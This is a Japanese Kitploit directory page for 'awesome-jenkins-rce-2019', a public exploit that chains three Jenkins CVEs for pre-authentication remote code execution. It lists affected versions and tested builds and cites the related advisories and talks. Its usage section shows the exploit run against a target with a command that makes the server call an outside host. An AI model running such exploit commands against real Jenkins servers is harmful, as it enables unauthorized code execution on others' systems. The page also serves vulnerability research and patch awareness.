Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
awesome-jenkins-rce-2019 — 2017年5月以来、Jenkinsには事前認証RCEは存在しませんでしたが、これこそがそれです! | Kitploit
ツール/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

2017年5月以来、Jenkinsには事前認証RCEは存在しませんでしたが、これこそがそれです!

リポジトリを見る
6101277年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

awesome-jenkins-rce-2019

2017年5月以降、Jenkinsには事前認証RCEはありませんでしたが、これこそがそれです!

CVE-2018-1000861、CVE-2019-1003005、CVE-2019-1003029を連鎖させて、より信頼性が高くエレガントな事前認証リモートコード実行を実現します!

影響一覧

  • ANONYMOUS_READ 無効

    • Jenkins バージョン < 2.138
  • ANONYMOUS_READ 有効(または通常のユーザーアカウントを使用)

    • Jenkins ビルド日時 < 2019-01-28

使用方法

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

テスト済み環境

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138(ANONYMOUS_READ 有効)
  • Jenkins 2.152(ANONYMOUS_READ 有効)
  • Jenkins 2.153(ANONYMOUS_READ 有効)
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

謝辞

  • @orange_8361 氏:CVE-2018-1000861
  • @0ang3el 氏:CVE-2019-1003005
  • @webpentest 氏:CVE-2019-1003029

私のHITB AMS 2019講演のスライドの一部:

1.png 2.png 3.png

参考文献

  • Hacking Jenkins Part 1 - Play with Dynamic Routing
  • Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
  • Jenkins Security Advisory 2018-12-05
  • Jenkins Security Advisory 2019-01-28
  • Jenkins Security Advisory 2019-03-06
ツールをダウンロード